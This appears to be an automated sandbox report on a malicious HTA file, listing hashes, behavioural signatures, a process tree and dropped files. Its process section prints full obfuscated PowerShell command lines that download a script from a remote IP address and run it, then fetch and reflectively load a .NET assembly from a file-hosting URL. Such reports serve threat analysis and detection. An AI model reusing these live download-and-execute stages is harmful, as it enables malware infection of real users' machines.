Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07-02-2025 13:34
Static task
static1
Behavioral task
behavioral1
Sample
specialgiftmakewithbestlovershegoodforbestthingsgood.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
specialgiftmakewithbestlovershegoodforbestthingsgood.hta
Resource
win10v2004-20250129-en
General
-
Target
specialgiftmakewithbestlovershegoodforbestthingsgood.hta
-
Size
14KB
-
MD5
e7a261ccc403f51d15952b9f81610ea6
-
SHA1
c9166e929e81c09d6d1998b2e6a052546f18a440
-
SHA256
70a1b6b8b689d6ed785e28002337fefc4933b61ae91fb12a023e01492081049e
-
SHA512
e6b05d47dedc9601d500cfadfbe441d0ce4a89b81cd939d6f036469a5676cdac2481f233718e8e3e25f2ead7916e1cdabff9a4c25f65aacb0ca2a471d889daff
-
SSDEEP
96:fCQGZ8MLI2eZ8MSI2bVqDO6Yjny1ixOZ8MgZ8MgfI2tZ8Mr:fCLNLfANSfRgPrAQN6NgffnNr
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 804 powershell.exe 6 2628 powershell.exe 7 2628 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2544 cmd.exe 804 powershell.exe -
pid Process 2628 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 804 powershell.exe 2628 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 804 powershell.exe Token: SeDebugPrivilege 2628 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2316 wrote to memory of 2544 2316 mshta.exe 31 PID 2316 wrote to memory of 2544 2316 mshta.exe 31 PID 2316 wrote to memory of 2544 2316 mshta.exe 31 PID 2316 wrote to memory of 2544 2316 mshta.exe 31 PID 2544 wrote to memory of 804 2544 cmd.exe 33 PID 2544 wrote to memory of 804 2544 cmd.exe 33 PID 2544 wrote to memory of 804 2544 cmd.exe 33 PID 2544 wrote to memory of 804 2544 cmd.exe 33 PID 804 wrote to memory of 2684 804 powershell.exe 34 PID 804 wrote to memory of 2684 804 powershell.exe 34 PID 804 wrote to memory of 2684 804 powershell.exe 34 PID 804 wrote to memory of 2684 804 powershell.exe 34 PID 2684 wrote to memory of 2784 2684 csc.exe 35 PID 2684 wrote to memory of 2784 2684 csc.exe 35 PID 2684 wrote to memory of 2784 2684 csc.exe 35 PID 2684 wrote to memory of 2784 2684 csc.exe 35 PID 804 wrote to memory of 2596 804 powershell.exe 37 PID 804 wrote to memory of 2596 804 powershell.exe 37 PID 804 wrote to memory of 2596 804 powershell.exe 37 PID 804 wrote to memory of 2596 804 powershell.exe 37 PID 2596 wrote to memory of 2628 2596 WScript.exe 38 PID 2596 wrote to memory of 2628 2596 WScript.exe 38 PID 2596 wrote to memory of 2628 2596 WScript.exe 38 PID 2596 wrote to memory of 2628 2596 WScript.exe 38
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\specialgiftmakewithbestlovershegoodforbestthingsgood.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C POwERsHELl.eXE -eX BYPAss -Nop -w 1 -C DEvICECRedEnTiAlDEPLoYMenT ; IeX($(iEx('[sysTem.TEXT.encOdiNG]'+[CHAR]0X3a+[cHar]0x3a+'uTF8.geTStrING([SysteM.cONVeRT]'+[ChaR]58+[cHAR]58+'frOmBaSe64sTRing('+[CHAr]34+'JGJyd1luaUVCWmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQkVSRGVmaW5JVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxtT04uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3ZBT09mWmQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcHlIdGhUUWRKLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZNU1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcG51QXpSdkJ5WVcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJRY01mR0FYWkxrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSVRPbXFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYnJ3WW5pRUJaaTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE4NS4yOS4xMC4zMC82NzcvZ3JlYXRuaWNlaGluZ3NiZXR0ZXJ3aXRoZ29vZHRoaW5nc2Zvcm5ld3dheW9mYmVzdC5nSUYiLCIkRU5WOkFQUERBVEFcZ3JlYXRuaWNlaGluZ3NiZXR0ZXJ3aXRoZ29vZHRoaW5nc2Zvcm5ld3dheW9mYi52YnMiLDAsMCk7c1RhclQtc0xFRXAoMyk7SW52T0tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGdyZWF0bmljZWhpbmdzYmV0dGVyd2l0aGdvb2R0aGluZ3Nmb3JuZXd3YXlvZmIudmJzIg=='+[cHAr]0X22+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOwERsHELl.eXE -eX BYPAss -Nop -w 1 -C DEvICECRedEnTiAlDEPLoYMenT ; IeX($(iEx('[sysTem.TEXT.encOdiNG]'+[CHAR]0X3a+[cHar]0x3a+'uTF8.geTStrING([SysteM.cONVeRT]'+[ChaR]58+[cHAR]58+'frOmBaSe64sTRing('+[CHAr]34+'JGJyd1luaUVCWmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQkVSRGVmaW5JVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxtT04uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3ZBT09mWmQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcHlIdGhUUWRKLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZNU1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcG51QXpSdkJ5WVcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJRY01mR0FYWkxrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSVRPbXFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYnJ3WW5pRUJaaTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE4NS4yOS4xMC4zMC82NzcvZ3JlYXRuaWNlaGluZ3NiZXR0ZXJ3aXRoZ29vZHRoaW5nc2Zvcm5ld3dheW9mYmVzdC5nSUYiLCIkRU5WOkFQUERBVEFcZ3JlYXRuaWNlaGluZ3NiZXR0ZXJ3aXRoZ29vZHRoaW5nc2Zvcm5ld3dheW9mYi52YnMiLDAsMCk7c1RhclQtc0xFRXAoMyk7SW52T0tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGdyZWF0bmljZWhpbmdzYmV0dGVyd2l0aGdvb2R0aGluZ3Nmb3JuZXd3YXlvZmIudmJzIg=='+[cHAr]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mple_adb.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD73D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD73C.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2784
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\greatnicehingsbetterwithgoodthingsfornewwayofb.vbs"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AdABzAGUAYgBmAG8AeQBhAHcAdwBlAG4AcgBvAGYAcwBnAG4AaQBoAHQAZABvAG8AZwBoAHQAaQB3AHIAZQB0AHQAZQBiAHMAZwBuAGkAaABlAGMAaQBuAHQAYQBlAHIAZwAvADcANwA2AC8AMAAzAC4AMAAxAC4AOQAyAC4ANQA4ADEALwAvADoAcAB0AHQAaAAnADsAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAgAD0AIAAkAG8AcgBpAGcAaQBuAGEAbABUAGUAeAB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMQAwADAAOAAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AagB6AHcARQBIAEEASgBQAHgASwBMAEwAegBnAFoARgBoAFkAVgBBAFEATQBBAE8ARQBOAEgAMQBRAHcAdgA4AGEAcwBFAG4ANAAzAHIATgBIADgAdwBPAGcAcQB4AGcATABOADUAeQBnAGcARQBLAGgAOQBFAGcAQQA5ADcARwBnAGMATABYAFEAZwAmAHAAawBfAHYAaQBkAD0AMwA0ADIAOAAwADMAZAAxAGMAYwA0AGUAMwBiADgAMAAxADcAMwA4ADgAOAAyADQAOQA1AGIANQBmAGUAOQBkACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAZgBhAGwAcwBlACcAKQApAA==')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD549e8920fb9af20b96850947cb68cac6a
SHA102674751fc513ec02fb38793539c5cb1093eb6f7
SHA25634d3bf7a65d09a85e7b16123ade08572fd4f1888b940c3104877175f2f544305
SHA512337cc050a98db2d58ed02653bd8b7b4f88bdc927de9ae2ef87933decd984e8d2a6925d0ac82e5c2231baa4d1e1127cc0a85deb8855ae384a8adef6db00c4ae9a
-
Filesize
3KB
MD5b53305b0a90b53d75f94011ac007a19d
SHA15d71ae5ab40b896a80e28c1932b277fbe79d0ef9
SHA2562c63eb6f3a0cca23b9df8f191f1a64deed27a71f75e2edd5c2e1622519b33f19
SHA512e2e6a529d7596e457aa5e942cfb20b3151d552c88e92bc5f66d98e385a0162803059785b10b980ee11c2c451abdfac877d57bb9848bac7936dc247d62cf13cd2
-
Filesize
7KB
MD584144a1c18ed3dc4474854549f185217
SHA15f51baa693e8b33e2f89e261532f2c1c48b092a4
SHA256bee4a597bd40ae4ff9149c6f984bcb2180f7ff3c970f0123afeb9d8f554d10a4
SHA5127da3faee37b5c733bf8d374b55792b3fc2507deb3a343fb9a0ef1c94f39d2d57694228e208b20bbee87c4d24c2f89a77d2b982e09ed8d254efed19d19d3511f5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5b7efba7ed4bc27e5577d338e59262daa
SHA17a3fd21220211b374c584228015362e31147da9f
SHA2566e3026fc041fce584ae18798d38cfacd7d61cb12dd557bd8ad21c9ad7774365d
SHA512beb85ae8510c4547d91ebb757cbbdde7b287d59b9290acc82ffaa57590b4eeca2f4c4b8f0c45d80c1d73d5b8fa9139a9151cbdd5eaebe73a09e1956d9a475880
-
Filesize
195KB
MD522149f3f69f6b23ef1368f1ca5ee8c36
SHA1532b2e6bea80e33c5c6ce6a42a6277f061ca897e
SHA2563dc045b58a5e12d588a87600428b8f3c051bf4a3875aafd19f4c1798a7117132
SHA512817fbaff51ae892aaf9267e0166bdf7384aa7a8f12df8efe601cb7e9f71ecf8c2d26e31ddfd5943a7383d0bf6f03b7227e6b55c639e2b26b2f8394ca8c49b72a
-
Filesize
652B
MD51989ca7238016390f2fdffb7b00829ca
SHA174043c7e1a6b84637c06592e4ad901197d5d1889
SHA256323fb68af763b73b199f8558a4fb77f00ed82c51c0c2ba635ed845f28a82a8b7
SHA512c3a22304072e420b120a906db3c1f0d460dcc2df84bbe5eb47d4e04747e6fc9c20984abd083fe692ac175aa8428e520fbaa91c4ed0d09a39a12fee983b05c1a2
-
Filesize
488B
MD52c00e5ba50babb3432415a036131314a
SHA1f3ed28f53d55ce8cd28a07f7e1cfeb6ce0df56b0
SHA2569a198855c0cf764ca07f17c267574eabcbce69aa0378276eb3790d99228a6195
SHA512c1f6139dbcbd160af0c2d26ee897a6ea1d8d0cf42544c8c2dc5efffcb021461a69eeb0f18decbbc36f4b203bc5f7dae275c3fa6118b642184a1b7a06cbb16c54
-
Filesize
309B
MD58beea00114a63e60486f4fee9457aed6
SHA17445907ab91e4fc10930f44b77e1f26a8f95c716
SHA256537fe1eee97146d56efdf9c2964978418812cfba9d1d953f07ba42a1040a4239
SHA512f17c0ac6272a4972be4a05a60dd08347c292f81430ec1f307019ddb64827a008c52957889c5848383846508d73ccaa7d728c07aad8ab6de47233a053c5f29ca0